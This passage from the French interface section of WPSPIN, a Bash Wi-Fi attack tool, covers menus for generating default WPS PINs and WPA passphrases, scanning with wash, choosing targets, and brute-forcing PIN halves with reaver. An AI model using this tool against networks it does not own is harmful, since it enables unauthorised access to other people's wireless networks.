  3950.  Se recomienda elegir el opción 3 (cambiar interfaz) para cambiar de interfaz$colorbase "
  3951.  )
  3952.  
  3953.  
  3954.  
  3955. ROOT_ADVERTENCIA=$( echo -e "                                        
  3956.                 $rojo ¡ADVERTENCIA! $amarillo AUSENCIA DE PRIVILEGIOS ROOT
  3957. $colorbase
  3958. $rojo No tiene privilegios de administrador, WPSPIN no puede funcionar con normalidad
  3959.          Ejecute el script con sudo o inicie una consola como root$colorbase"
  3960. )                                                                                              # warning display for non root user
  3961.  
  3962.  
  3963.  
  3964.  
  3965.  
  3966.  
  3967. DIRECTORY_ADVERTENCIA=$( echo -e "                                        
  3968.              $rojo       ¡ADVERTENCIA! $amarillo WPSPIN EN MODO REDUCIDO
  3969. $colorbase
  3970. $rojo         Debe situarse en el directorio WPSPIN para lanzar el script
  3971.   Deje el script en su carpeta de origen sin cambiar el nombre de la carpeta
  3972.                            use cd para ubicarse $colorbase"
  3973. )                                                                                              # warning display for non WPSPIN directory
  3974.  
  3975.  
  3976.  
  3977.  
  3978. ###################################################################################################################################
  3979. ######################################################## 3 > FRANÇAIS (Else in the if language loop)
  3980.  
  3981.  
  3982. else
  3983.  
  3984.  
  3985.  
  3986.  
  3987.  
  3988. OUTPUT(){
  3989.  
  3990.  
  3991. echo -e "$colorbase"
  3992. echo "+------------------------------------------------------------------------------+"
  3993. echo -e "| $violet                      INFORMATION  SUR LE DISPOSITIF  $colorbase                       |"
  3994. echo "+------------------------------------------------------------------------------+"
  3995.  
  3996.  
  3997. if [ -n "${FABRICANTE}" ]; then
  3998.      DISPLAYFABRICANTE=$( echo "$FABRICANTE                                                              " | cut -b -61 )
  3999.    echo -e "| Fabricant    :$amarillo $DISPLAYFABRICANTE $colorbase|"
  4000. fi
  4001.  
  4002. if [ -n "${DEFAULTSSID}" ]; then
  4003.     DISPLAYDEFAULTSSID=$( echo "$DEFAULTSSID                                                              " | cut -b -61 )
  4004.    echo -e "| SSID défaut  :$amarillo $DISPLAYDEFAULTSSID $colorbase|"
  4005. fi
  4006.  
  4007. if [ -n "${MODEL}" ]; then
  4008. DISPLAYMODEL=$( echo "$MODEL                                                              " | cut -b -61 )
  4009. echo -e "| Modèle       :$amarillo $DISPLAYMODEL $colorbase|"
  4010. fi
  4011.  
  4012.  unset DISPLAYFABRICANTE && unset DISPLAYDEFAULTSSID && unset DISPLAYMODE
  4013.  
  4014.  
  4015.  
  4016.  
  4017.   if [ "$UNKNOWN" -eq "0"  ];
  4018.     then
  4019.  
  4020.  
  4021.      echo "+------------------------------------------------------------------------------+"
  4022.      echo -e "|   $violet                        INFORMATION SUR LE WPS        $colorbase                     |"
  4023.      echo "+------------------------------------------------------------------------------+"
  4024.  
  4025.        if [ "$ACTIVATED" -eq "1" ] ;
  4026.         then
  4027.           echo -e "| $verdefluo                           WPS ACTIVE PAR DÉFAUT         $colorbase                    |"
  4028.           echo "+------------------------------------------------------------------------------+"
  4029.        else
  4030.           echo -e "|        $rojo                  WPS NON ACTIVE PAR DÉFAUT       $colorbase                    |"
  4031.           echo "+------------------------------------------------------------------------------+"  
  4032.        fi
  4033.  
  4034.       if  [ "$APRATE" -eq "0" ] ;
  4035.         then
  4036.         echo -e "|        $verdefluo                    PAS DE BLOCAGE DU WPS          $colorbase                   |"  
  4037.         echo "+------------------------------------------------------------------------------+"
  4038.       else
  4039.         echo -e "|     $rojo              ATTENTION : SYSTÈME DE BLOCAGE DU WPS        $colorbase              |"
  4040.         echo "+------------------------------------------------------------------------------+"
  4041.       fi
  4042.  
  4043.       if  [ "$SPECIAL" -eq "1" ] ;
  4044.         then
  4045.         echo -e "|  $rojo  VÉRIFIEZ LE MODÈLE EXACT, PLUSIEURS MODÈLES PARTAGENT CE RANG DE BSSID  $colorbase  |"
  4046.         echo "+------------------------------------------------------------------------------+"
  4047.       fi
  4048.   DISPLAYPIN=$( echo "$PIN $PIN1 $PIN2 $PIN3 $PIN4 $PIN5 $PIN6 $PIN7 $PIN8                                                                   " | cut -b -78 )        
  4049.  
  4050. echo "+------------------------------------------------------------------------------+"
  4051. echo -e "|       $violet                      PIN(s) par DÉFAUT     $colorbase                           |"    
  4052. echo -e "|$amarillo$DISPLAYPIN$colorbase|"
  4053. echo "+------------------------------------------------------------------------------+"
  4054.  elif [ "$UNKNOWN" -eq "1"  ]; then
  4055.  
  4056.     echo "+------------------------------------------------------------------------------+"
  4057.     echo -e "|         $rojo                    DISPOSITIF INCONNU           $colorbase                    |"
  4058.     echo "|                                                                              |"
  4059.     echo "+------------------------------------------------------------------------------+"
  4060.     echo -e "|                         $orange PIN POSSIBLE :$amarillo $PIN       $colorbase                      |"
  4061.     echo "+------------------------------------------------------------------------------+"
  4062.  
  4063. else
  4064. echo "+------------------------------------------------------------------------------+"
  4065.     echo -e "|          $rojo                       NON SUPPORTÉ     $colorbase                            |"
  4066.     echo "|                                                                              |"
  4067.     echo "+------------------------------------------------------------------------------+"
  4068.  
  4069.  
  4070. fi
  4071.  
  4072. if [ -n "${DEFAULTWPA}" ]; then
  4073. DEFAULTWPADISPLAY=$(echo "$DEFAULTWPA                                                                           " | cut -c -78)
  4074.  echo -e "|  $violet                       PASSPHRASE WPA par DÉFAUT   $colorbase                         |"
  4075.  echo -e "|$verdefluo$DEFAULTWPADISPLAY$colorbase|"
  4076.  echo "+------------------------------------------------------------------------------+"
  4077. fi
  4078.  
  4079. }
  4080.  
  4081.  
  4082.  
  4083. DATASGENERADOR(){
  4084. echo -e "$colorbase"
  4085. echo -e "                    -------------------------------------"
  4086. echo ""
  4087. read -ep "                1 > Introduire eSSID et presser <Enter> : "  ESSID          # essid comme variable              
  4088. echo "  "
  4089. read -ep "                2 > Introduire bSSID et presser <Enter> : " BSSID           # bssid comme variable
  4090. echo "  "
  4091. while !(echo $BSSID | tr a-f A-F | egrep -q "^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$")
  4092. do                                                                           # Petit cadeau, de antares_145, suivez son blog sur la web ,le bloc note d'antares,
  4093. echo -e " $rojo Erreur de syntaxe : MAC Non Conforme $colorbase"
  4094. echo "  "
  4095. read -ep "                2 > Introduire bSSID et presser <Enter> : " BSSID
  4096. echo "  "            
  4097. done
  4098. }
  4099.  
  4100.  
  4101.  
  4102.  
  4103. SHORTMENUE(){                                                 # Menu avec fonctionnalité réduite )pas de scan, pas d'attaque) auquel sera cantonné l'utilisateur jusqu'à ce
  4104.                                                               # ce  que mort s'en suive, trois heure du mat je commence à péter un câble, jusqu'à ce que il y ait une
  4105.                                                              # interface compatible reconnue
  4106.  
  4107. echo "$SORTMENUE_WARNING"
  4108. echo ""
  4109. echo ""
  4110. echo -e "                              $orange       ¿   $negro  ?           "
  4111. echo -e "                            $verde    ?   $azul    ?      $colorbase        "
  4112. echo -e "                        $blanco       ¿ $colorbase  >X<  $gris  ¿         $colorbase "    
  4113. echo -e "                               -  (O o)  -         "
  4114. echo -e "                    +---------ooO--(_)--Ooo-------------+   "
  4115. echo -e "                    |                                   |   "
  4116. echo -e "                    | $blanco   1$colorbase -$amarillo  GÉNÉRATEUR PIN$colorbase            |   "
  4117. echo -e "                    | $blanco   2$colorbase -$amarillo  DÉTECTER INTERFACES$colorbase       |   "
  4118. echo -e "                    | $blanco   3$colorbase -$amarillo  SORTIR$colorbase                    |   "
  4119. echo -e "                    |                                   |   "
  4120. echo -e "                    +-----------------------------------+   "
  4121. echo ""
  4122. echo ""
  4123. echo ""
  4124. echo -e "                              Votre choix : $rojo"
  4125. echo ""  
  4126. read -ep  "                                      " SHORTMENUE_CHOICE                
  4127. echo -e "$colorbase"
  4128.  
  4129.  
  4130. if [ "$SHORTMENUE_CHOICE" == "1" ] ; then
  4131.  
  4132.     DATASGENERADOR
  4133.     GENERATE
  4134.     OUTPUT
  4135. unset PIN2 && unset PIN3 && unset PIN4 && unset PIN5 && unset PIN6 && unset PIN7 && unset PIN8 && unset  FABRICANTE  && unset DEFAULTSSID   && unset MODEL
  4136.  
  4137. echo -e " "
  4138. echo -e "      ...$verdefluo pressez <enter> pour continuer$colorbase ..."    # pause to let the user copy the given datas
  4139. read -ep "" NIENTE
  4140.  
  4141.    SHORTMENUE  
  4142.  
  4143. elif [ "$SHORTMENUE_CHOICE" == "2" ] ; then
  4144.  
  4145.     IFACE
  4146.  
  4147. elif [ "$SHORTMENUE_CHOICE" == "3" ]; then
  4148.  
  4149. CLEAN    
  4150. CIAO
  4151.  
  4152. exit
  4153.  
  4154. else
  4155.  
  4156. echo -e " ................ $rojo  Option non valide $colorbase........"
  4157.  
  4158.  SHORTMENUE
  4159.    
  4160.  
  4161. fi
  4162.  
  4163. }
  4164.  
  4165.  
  4166.  
  4167.  
  4168. SELECT_THEIFACE (){
  4169. read -ep "                          interface sélectionnée : " i        # ask the user to choose among avalaible interfaces  
  4170. }
  4171.  
  4172.  
  4173.  
  4174.                                                            # up part of the interface selection menue  
  4175.  
  4176.  
  4177. WASH_DISPLAY(){                                    # WE make a break here to be able to just display the results later and because it was confusing for langiages
  4178.  
  4179. if [ "$WALSH_O_WASH" == "wash" ]; then
  4180.  
  4181.  
  4182. echo "--------------------------------------------------------------------------------"        # devolvemos el resultado reorganizandolo
  4183. echo -e "  $blanco          BSSID         RSSI  WPS  Blocage    PIN    Canal     ESSID  $colorbase"          
  4184. echo "--------------------------------------------------------------------------------"
  4185. echo ""
  4186.  
  4187. else
  4188.  
  4189. echo "--------------------------------------------------------------------------------"        # devolvemos el resultado reorganizandolo
  4190. echo -e "  $blanco           BSSID                 PIN               ESSID  $colorbase"          
  4191. echo "--------------------------------------------------------------------------------"
  4192. echo ""
  4193.  
  4194. fi
  4195.  
  4196.  
  4197. for i in ${!BSSID[*]}; do
  4198.  
  4199.   CHANNEL_CHECK=$(echo ${CHANNEL[${i}]})
  4200.   LOCK_CHECK=$(echo ${LOCKED[${i}]})
  4201.   BSSID=$(echo ${BSSID[${i}]})
  4202.   ESSID=$(echo ${ESSID[${i}]})
  4203.  
  4204.   GENERATE
  4205.  
  4206.  
  4207. if [ "$WALSH_O_WASH" == "wash" ]; then  
  4208.   if [ "$LOCK_CHECK" = "No" ]; then
  4209.   DISPLAY_LOCKED=$( echo -e "$verde Non$colorbae")
  4210.   else
  4211.   DISPLAY_LOCKED=$( echo -e "$rojo Oui$colorbae")  
  4212.   fi
  4213.  
  4214.   if [ "$CHANNEL_CHECK" -lt 10 ]; then
  4215.   DISPLY_CHANNEL=$( echo " $CHANNEL_CHECK")
  4216.   else
  4217.   DISPLY_CHANNEL=$(echo ${CHANNEL[${i}]})
  4218.   fi
  4219. fi  
  4220.  
  4221.   if [ "$UNKNOWN" = 1 ]; then
  4222.     DISPLAY_PIN=$( echo -e "$orange$PIN$colorbase" )
  4223.   elif [ "$UNKNOWN" = 0 ]; then
  4224.     DISPLAY_PIN=$( echo -e "$verdefluo$PIN$colorbase" )
  4225.   else
  4226.     DISPLAY_PIN=$(echo -e "$rojo INCONNU$colorbase")
  4227.   fi
  4228.  
  4229. if [ "$i" -lt 10 ]; then
  4230.   NUM=$( echo -e " $amarillo$i$colorbase")
  4231.   else
  4232.   NUM=$( echo -e "$amarillo$i$colorbase")
  4233. fi  
  4234.  
  4235. if [ -n "${DEFAULTWPA}" ]; then
  4236.     DISPLAYBSSID=$( echo -e "$azulfluo$BSSID$colorbase")
  4237.   else
  4238.     DISPLAYBSSID=$( echo -e "$blanco$BSSID$colorbase")
  4239.   fi
  4240.  
  4241. if [ "$WALSH_O_WASH" == "wash" ]; then
  4242.   echo -e " $amarillo$NUM$colorbase   $DISPLAYBSSID   ${RSSI[${i}]}   ${WPS[${i}]}   $DISPLAY_LOCKED    $DISPLAY_PIN   $DISPLY_CHANNEL    $blanco$ESSID$colorbase "
  4243. else
  4244.   echo -e " $NUM    $DISPLAYBSSID         $DISPLAY_PIN        $blanco$ESSID$colorbase  "
  4245. fi
  4246.  
  4247. done
  4248. echo ""
  4249. echo "--------------------------------------------------------------------------------"
  4250.  
  4251. echo ""
  4252.  
  4253. CONFORMITY=$(echo ${#BSSID[@]})
  4254.  
  4255. if [ "$CONFORMITY" = 0 ]; then
  4256.  
  4257.   echo -e  "$rojo ERREUR -$blanco aucun objectif à l'horizon, voyons si wash peut utiliser $amarillo$MON_ATTACK$colorbase "
  4258.  
  4259.     if [[ ! `(timeout 4 $WALSH_O_WASH -i $MON_ATTACK -C | grep ERROR )` ]];
  4260.       then
  4261. echo "--------------------------------------------------------------------------------"
  4262.     echo -e "$verdefluo                          wash peut utiliser $amarillo$MON_ATTACK$colorbase"
  4263. echo "--------------------------------------------------------------------------------"
  4264.  
  4265. echo -e "$blanco
  4266. - Peut être les points d'accès environnant$rojo ne disposent pas de WPS$blanco...
  4267. - Peut être n'avez vous pas choisis$verdefluo l'interface la plus indiquée$blanco...
  4268. - Déconnectez$amarillo tous vos dispositifs$blanco
  4269. - Vérifiez les$amarillo privilèges et permissions$blanco
  4270. - Regardez vôtre$amarillo point de montage$blanco si vous avez WPSPIN situé dans un$amarillo USB$blanco ou un$amarillo HDD externe$blanco
  4271. (attention si vous êtes en mode live)
  4272. -$kindofviolet Bientôt Iw scan mode pour proposer une alternative a wash$blanco.
  4273. -$blanco Retour au menu de$kindofviolet sélection d'interface$blanco  
  4274. $blanco(si vous disposez de plusieurs chipsets il vous sera demandé de choisir entre ceux-ci)$blanco
  4275. ... Si ce message continue à apparaître;
  4276.   ... vérifiez l’installation de reaver et wash
  4277. $verdefluo  Vous pouvez obtenir de l'aide sur$amarillo crack-wifi.com$verdefluo et$amarillo lampiweb.com$colorbase"
  4278.   sleep 5
  4279.   airmon-ng stop $MON_ATTACK &>/dev/null
  4280.   unset MON_ATTACK
  4281.   IFACE
  4282.   BIG_MENUE                      
  4283.   else
  4284. echo "--------------------------------------------------------------------------------"
  4285.     echo -e "$rojo                          wash ne peut communiquer avec $amarillo$MON_ATTACK$colorbase"
  4286. echo "--------------------------------------------------------------------------------"
  4287. echo -e "$blanco
  4288. - Vérifiez votre installation de$amarillo wash/reaver$blanco
  4289. - Vérifiez le$amarillo bouton d'allumage du wireless$blanco
  4290. - Vérifiez vos$amarillo ports USB
  4291.  
  4292. $blanco    Vous allez être redirigés vers la$kindofviolet selection d'interface $blanco
  4293.           pendant que WPSPIN$verdefluo cherche une solution
  4294. $blanco(si vous disposez de plusieurs interfaces il vous sera demandé de choisir entre elles)
  4295. $colorbase"
  4296.   sleep 5
  4297.   if [[ -n `(airmon-ng stop $MON_ATTACK | grep SIOCSIFFLAGS )` ]]; &>/dev/null
  4298.     then
  4299. echo "--------------------------------------------------------------------------------"
  4300. echo -e " $rojo                      RF-Kill bloque le dispositif
  4301.  
  4302. $verdefluo Vérifiez que votre wireless soit activé et vérifiez votre interrupteur wireless $colorbase"
  4303. echo "--------------------------------------------------------------------------------"
  4304.   sleep 5
  4305.   fi
  4306.   unset MON_ATTACK
  4307.   IFACE
  4308.   BIG_MENUE
  4309.  fi
  4310.  
  4311.  
  4312.    
  4313.  
  4314.      
  4315.   else  
  4316. TARGETNUMBER=$( echo -e "$colorbase Introduire le numéro de l'objectif : $amarillo" )  
  4317. read  -ep "$TARGETNUMBER " i
  4318. echo -e "$colorbase"
  4319.  
  4320. until [[ $i = *[[:digit:]]* ]] && [[ "$i" -lt "$CONFORMITY" ]]  &&  [[ "$i" -ge 1 ]]   ; do
  4321.    echo -e "     $rojo OPTION INEXISTANTE  $colorbase"
  4322.       echo ""
  4323.       read  -ep "$TARGETNUMBER " i
  4324.       echo -e "$colorbase"
  4325.    done
  4326. fi
  4327.  
  4328.  
  4329. BSSID=$(echo ${BSSID[${i}]})
  4330. ESSIDSUCIO=$(echo ${ESSID[${i}]})
  4331. ESSID="${ESSIDSUCIO%"${ESSIDSUCIO##*[![:space:]]}"}"
  4332. CHANNEL=$(echo ${CHANNEL[${i}]})
  4333. unset PIN2 && unset PIN3 && unset PIN4 && unset PIN5 && unset PIN6 && unset PIN7 && unset PIN8
  4334.  
  4335. GENERATE
  4336.  
  4337. }
  4338.  
  4339.  
  4340. BIG_MENUE_DISPLAY(){
  4341.  
  4342. echo -e "$colorbase copyleft GPL v.3, support the free software!"
  4343. echo -e "
  4344.        .$amarillo'(     /$rojo·-.  $amarillo  )(.$rojo--.  $amarillo   /$rojo·-.  .$amarillo'(   )\  )\  $rojo
  4345.    ,') \  )  ,' _  \  (   ._.'  ,' _  \ \  ) (  \, / $colorbase     coded by$blanco kcdtv $rojo  
  4346.   (  /(/ /  (  '-' (   ·-. .   (  '-' ( ) (   ) \ (   $colorbase featuring  $blanco antares_145$rojo
  4347.    )    (    ) ,._.'  ,_ (  \   ) ,._.' \  ) ( ( \ \    $blanco r00tnull$colorbase -$blanco 1camaron1$rojo
  4348.   (  .'\ \  (  '     (  '.)  ) (  '      ) \  ·.)/  )    $blanco Coeman76$colorbase -$blanco Spawn$rojo  
  4349. $amarillo   )/   )/   )/   $rojo    '._,_.' $amarillo  )/        )/  $rojo   '$amarillo.( $colorbase  and the$blanco lampiweb team $colorbase"
  4350. echo ""
  4351. echo ""
  4352. echo -e "    $amarillo www.crack-wifi.com     www.lampiweb.com    www.auditoriaswireless.net$colorbase"
  4353.  
  4354. echo ""
  4355. echo ""
  4356. echo -e "                                                        "
  4357. echo -e " $magenta      _   ''   $rojo  _ () _      $amarillo                _ _ _                      
  4358. $magenta     [|)efault$rojo  ||)[][|\|$magenta  generator  with$amarillo   \\/\/||)S $magenta attack  interface
  4359.   $rojo              L|          $amarillo                     L|  $magenta  ''                   "
  4360. echo ""
  4361.  
  4362. echo -e "$rojo
  4363.                          _ _    _       _        ||
  4364.                         //\/\ E[|\|ue  ||)rincipaL_]  ''
  4365.                                        L|    $colorbase"
  4366. echo "
  4367. "
  4368. echo -e "                +----------------------------------------------+  "
  4369. echo -e "                |                                              |  "
  4370. echo -e "                |  $amarillo   1$colorbase  -$blanco  MODE AUTOMATISE (WASH ET REAVER)$colorbase   |  "
  4371. echo -e "                |  $amarillo   2$colorbase  -$blanco  PIN GÉNÉRATEUR (AVEC MENUE ATAQUE)$colorbase |  "
  4372. echo -e "                |  $amarillo   3$colorbase  -$blanco  CHANGER INTERFACE$colorbase                  |  "
  4373. echo -e "                |  $amarillo   4$colorbase  -$blanco  REDÉMARRER OU CHANGER LANGUE$colorbase       |  "
  4374. echo -e "                |  $amarillo   5$colorbase  -$blanco  SORTIR$colorbase                             |  "
  4375. echo -e "                |                                              |  "
  4376. echo -e "                +----------------------------------------------+  "
  4377. echo ""
  4378. echo ""
  4379. echo -e "                                 Votre choix : $rojo "
  4380. echo ""
  4381. read -ep "                                       " BIG_MENUE_CHOICE
  4382. echo -e "$colorbase"
  4383. until [[ $BIG_MENUE_CHOICE = *[[:digit:]]* ]]  &&  [[ "$BIG_MENUE_CHOICE" -gt "0" ]]  && [[ "$BIG_MENUE_CHOICE" -lt "6" ]] ; do
  4384.  BIG_MENUE_DISPLAY
  4385. done
  4386.  
  4387. }
  4388.  
  4389.  
  4390.  
  4391.  
  4392. CIAO(){
  4393.  
  4394. echo -e "$colorbase"
  4395. echo -e "                           A bientôt  
  4396.                         venez nous rendre visite sur$amarillo crack-wifi.com$colorbase"
  4397. echo -e "          et pour les hispanophones,$amarillo lampiweb.com$colorbase et$amarillo auditoriaswireless.net $colorbase  "
  4398. echo -e "                          $verdefluo  |$amarillo'$verdefluo|        "
  4399. echo -e "                           _|_|_        "
  4400. echo -e "                      $colorbase  - $blanco (O o) $colorbase -         "          
  4401. echo -e "----------------------$blanco ooO$colorbase--(_)-$blanco Ooo$colorbase--------------------------------------------"
  4402. exit 0
  4403. }
  4404.  
  4405.  
  4406.  
  4407.  
  4408.  
  4409.  
  4410. ATTACK_MENUE_DISPLAY(){
  4411.  
  4412. echo -e "               "                            
  4413. echo -e "              Objectif >$blanco $ESSID$colorbase mac > $blanco $BSSID $colorbase"
  4414. echo -e "              +-----------------------------------------------------+  "
  4415. echo -e "              |  $blanco 1 $colorbase -$amarillo ATTAQUER OBJECTIF AVEC REAVER, PIN $rojo $PIN$colorbase |  "
  4416. echo -e "              |  $blanco 2 $colorbase -$amarillo ENTREZ UN PIN MANUELLEMENT                 $colorbase  |  "
  4417. echo -e "              |  $blanco 3 $colorbase -$amarillo DÉFINISSEZ UNE SÉQUENCE DE PIN$colorbase               |  "
  4418. echo -e "              |  $blanco 4 $colorbase -$amarillo MODIFIEZ VOTRE LIGNE DE COMMANDE REAVER$colorbase      |  "
  4419. echo -e "              |  $blanco 5 $colorbase -$verdefluo SÉLECTIONNEZ UN AUTRE OBJECTIF$colorbase               |  "
  4420. echo -e "              |  $blanco 6 $colorbase <$azulfluo RETOUR$colorbase :$amarillo CHANGEZ D'INTERFACE$colorbase +$amarillo NOUVEAU SCAN$colorbase  |  "
  4421. echo -e "              |  $blanco 7 $colorbase -$azulfluo REDÉMARREZ$blanco /$azulfluo CHANGEZ DE LANGUE$colorbase               |  "
  4422. echo -e "              |  $blanco 8 $colorbase -$rojo SORTIR $colorbase                                      |  "
  4423. echo -e "              +-----------------------------------------------------+  "
  4424. echo ""
  4425. echo ""
  4426. echo -e "                                 Votre Choix  $rojo"                  
  4427. echo ""
  4428. read -ep "                                      " ATTACK_MENUE_CHOICE
  4429. echo -e "$colorbase"
  4430.  
  4431. until [[ $ATTACK_MENUE_CHOICE = *[[:digit:]]* ]] && [[ "$ATTACK_MENUE_CHOICE" -lt "9" ]]  &&  [[ "$ATTACK_MENUE_CHOICE" -gt "0" ]]; do
  4432.  ATTACK_MENUE_DISPLAY
  4433. done
  4434.  
  4435. }
  4436.  
  4437.  
  4438.  
  4439.  
  4440.  
  4441. CUSTOMPIN()                     # This function is used to allow the user to manually enter a PIN to be tryed first
  4442. {                               # option 2 in the attack menue
  4443.  
  4444. unset SELECTEDPIN 2> /dev/null  # we delete the former selected PIN if it remained set
  4445.  
  4446. echo ""
  4447. echo -e " Saisissez les$amarillo 7 premiers chiffres$colorbase du$amarillo PIN$colorbase que vous voulez lancer pour l'attaque
  4448. $amarillo      Il n'est pas nécessaire de mettre le checksum $colorbase (dernier numéro)$colorbase
  4449. $rojo "
  4450. read -ep "                                " SELECTEDPIN
  4451. echo -e "$colorbase"
  4452. while !(echo $SELECTEDPIN | egrep -q "^([0-9]{7})$")
  4453.  do
  4454.    echo ""
  4455.    echo -e "           $rojo ERREUR: IL FAUT RENTRER LES 7 PREMIER CHIFFRES DU PIN $colorbase"
  4456.    CUSTOMPIN
  4457. done
  4458. }
  4459.  
  4460.  
  4461. SECATOR()                   # This function let the user choose for a sequence of PIN to try first, we determine 4 values, 2 4 digits strings
  4462. {                           # ( first half PIN ) and 2 3 digits strings ( second half )
  4463.  
  4464. unset INICIOSEQUENCEFIRST 2> /dev/null  #  We ensure that there is not former values stored
  4465. unset FINSEQUENCEFIRST 2> /dev/null     #
  4466.  
  4467.  if [[ "$HEAD3" = "0" ]]; then         # if the first half PIN hasn't been found yet we propose to customize sequence on the first PIN
  4468.     echo "+------------------------------------------------------------------------------+"
  4469.     echo -e "|        $azullight   1* CRÉATION DE LA SÉQUENCE SUR LA$verdefluo PREMIÈRE MOITIÉ DE PIN$colorbase           |"
  4470.     echo "+------------------------------------------------------------------------------+"
  4471.     ASKSSTARTSEQUENCE=$( echo -e "$colorbase Saisissez les 4 numéros $blanco en début de séquence$verdefluo ")
  4472.    
  4473.     read -ep "$ASKSSTARTSEQUENCE" INICIOSEQUENCEFIRST
  4474. while !(echo $INICIOSEQUENCEFIRST | egrep -q "^([0-9]{4})$")
  4475.            do
  4476.             echo ""
  4477.             echo -e "                      $rojo  ERREUR: VOUS DEVEZ SAISIR 4 NUMÉROS $colorbase "
  4478.             echo ""
  4479.              read -ep "$ASKSSTARTSEQUENCE" INICIOSEQUENCEFIRST
  4480. done
  4481.    
  4482.     ASKENDSEQUENCE=$( echo -e "$colorbase Saisissez les 4 numéros $blanco en fin de séquence$rojo ")
  4483.    
  4484.     read -ep "$ASKENDSEQUENCE" FINSEQUENCEFIRST                                                                      
  4485.    
  4486.    
  4487.           while !(echo $FINSEQUENCEFIRST | egrep -q "^([0-9]{4})$")
  4488.            do
  4489.             echo ""
  4490.             echo -e "                       $rojo ERREUR: VOUS DEVEZ SAISIR 4 NUMÉROS $colorbase "
  4491.             echo ""  
  4492.                 read -e -p "$ASKENDSEQUENCE" FINSEQUENCEFIRST                                                              
  4493.          done
  4494.  
  4495.   fi
  4496.  
  4497. unset INICIOSEQUENCESECOND 2> /dev/null  #  We ensure that there is not former values stored
  4498. unset FINSEQUENCESECOND 2> /dev/null
  4499.  
  4500.     echo -e "$colorbase+------------------------------------------------------------------------------+"
  4501.     echo -e "|       $azullight    2* CRÉATION DE LA SÉQUENCE SUR LA$rojo DEUXIÈME MOITIÉ DE PIN  $colorbase         |"
  4502.     echo -e "+------------------------------------------------------------------------------+"
  4503.     echo -e "|        $blanco  ($amarillo pas besoin de checksum$blanco -$rojo Saisissez X pour sortir$blanco )$colorbase                |"
  4504.     ASKSSTARTSEQUENCE2=$( echo -e "$colorbase Saisissez les 3 numéros$blanco au début de la séquence$verdefluo ")
  4505.     read -ep "$ASKSSTARTSEQUENCE2" INICIOSEQUENCESECOND    
  4506.  
  4507.    
  4508.  
  4509.       while !(echo $INICIOSEQUENCESECOND | egrep -q "^([0-9]{3})$")
  4510.         do
  4511.             if [[ "$INICIOSEQUENCESECOND" == "X" || "$INICIOSEQUENCESECOND" == "x" ]] ; then
  4512.    
  4513.               break
  4514.             fi
  4515.           echo ""
  4516.           echo -e "              $rojo ERREUR: VOUS DEVEZ SAISIR 3 NUMÉROS (X por sortir) $colorbase "
  4517.           echo ""
  4518.           read -ep "$ASKSSTARTSEQUENCE2" INICIOSEQUENCESECOND
  4519.       done
  4520.  
  4521.  
  4522.     ASKENDSEQUENCE2=$( echo -e "$colorbase Saisissez les 3 numéros$blanco en fin de séquence$rojo ")
  4523.  
  4524.     read -ep "$ASKENDSEQUENCE2" FINSEQUENCESECOND
  4525.  
  4526.     while !(echo $FINSEQUENCESECOND | egrep -q "^([0-9]{3})$")  
  4527.       do
  4528.          if [[ "$FINSEQUENCESECOND" == "X" || "$FINSEQUENCESECOND" == "x" ]]; then
  4529.            break
  4530.          fi
  4531.           echo ""
  4532.           echo -e "              $rojo ERREUR: VOUS DEVEZ SAISIR 3 NUMEROS (X por sortir) $colorbase "
  4533.           echo ""
  4534.           read -ep "$ASKENDSEQUENCE2" FINSEQUENCESECOND
  4535.  
  4536.     done
  4537. echo -e "$colorbase+------------------------------------------------------------------------------+"
  4538. }
  4539.  
  4540.  
  4541.  
  4542. SUMUPNOM6()
  4543. {
  4544. PINECRAN=$( printf '%04d\n' $HEAD1 )
  4545. PINLEFT=`expr 11000 '-' $HEAD1`
  4546. PINLEFTECRAN=$( printf '%05d\n' $PINLEFT )
  4547. PORCENT1=`expr $HEAD1 '*' 100 '/' 11`
  4548.  
  4549. PORCENT2=$( printf '%05d\n' $PORCENT1 )
  4550.  
  4551. INICIOPORCENT=$( echo "$PORCENT2" | cut -b -2 )
  4552.  
  4553. ENDPORCENT=$( echo "$PORCENT2" | cut -b 3- )
  4554.  
  4555. echo " +--------------------------------------+"
  4556. echo -e " |   $amarillo             RESUMÉ        $colorbase        | "    
  4557. echo " +--------------------------------------+"
  4558. echo -e " |    Attaque sur la$rojo première$colorbase moitié    | "
  4559. echo -e " |   Premières moitiés essayées - $amarillo$PINECRAN $colorbase |"    
  4560. echo -e " |    Il reste au maximum $amarillo $PINLEFTECRAN$colorbase PIN    |"
  4561. echo " +--------------------------------------+"
  4562. echo -e " |     $rojo$INICIOPORCENT$colorbase,$rojo$ENDPORCENT$colorbase% de l'attaque effectué    |"
  4563. echo " +--------------------------------------+"  
  4564. echo ""
  4565.  
  4566.  
  4567. }
  4568.  
  4569.  
  4570.  
  4571. SUMUPM6()
  4572. {
  4573.  
  4574. PINECRAN=$( printf '%04d\n' $HEAD1 )
  4575. PINECRAN2=$( printf '%03d\n' $HEAD2 )
  4576. PINLEFT=`expr 1000 '-' $HEAD2`
  4577. PINLEFTECRAN=$( printf '%03d\n' $PINLEFT )
  4578. PORCENT1=`expr '(' $HEAD2 '+' 10000 ')' '*' 100 '/' 11`
  4579. PORCENT2=$( printf '%04d\n' $PORCENT1 )
  4580. INICIOPORCENT=$( echo "$PORCENT2" | cut -b -2 )
  4581. ENDPORCENT=$( echo "$PORCENT2" | cut -b 2- )
  4582. echo -e " $colorabse "  
  4583. echo "+------------------------------------------------------------------------------+"
  4584. echo -e "|   $amarillo                                 RESUMÉ                            $colorbase        |"    
  4585. echo "+------------------------------------------------------------------------------+"
  4586. echo -e "|   $verdefluo PREMIÈRE MOITIÉ DE PIN VALIDE !$colorbase    |    Attaque sur la$rojo deuxième$colorbase moitié    |"
  4587. echo -e "|               $amarillo $PRIMERAMITAD$colorbase                   |    Deuxièmes moitiés testées - $amarillo$PINECRAN2$colorbase   |"
  4588. echo -e "|Premières moitiées de PIN testées $verdefluo$PINECRAN$colorbase |     Il reste au masimum$amarillo $PINLEFTECRAN$colorbase PIN      |"    
  4589.  
  4590. echo "+------------------------------------------------------------------------------+"
  4591. echo -e "|                        $rojo$INICIOPORCENT$colorbase,$rojo$ENDPORCENT$colorbase% de l'attaque effectués                       |"
  4592. echo "+------------------------------------------------------------------------------+"  
  4593. echo -e "$colorbase"
  4594.  
  4595. }
  4596.  
  4597.  
  4598.  
  4599.  
  4600. PINFOUND(){
  4601.  
  4602. DATE=$(  date | cut -d "," -f 1 )
  4603. NEWNAME=${DATE// /_}
  4604. DISPLAYNEWNAME1=$( echo "$NEWNAME-$WPCNAME                                                            " | cut -b -70 )
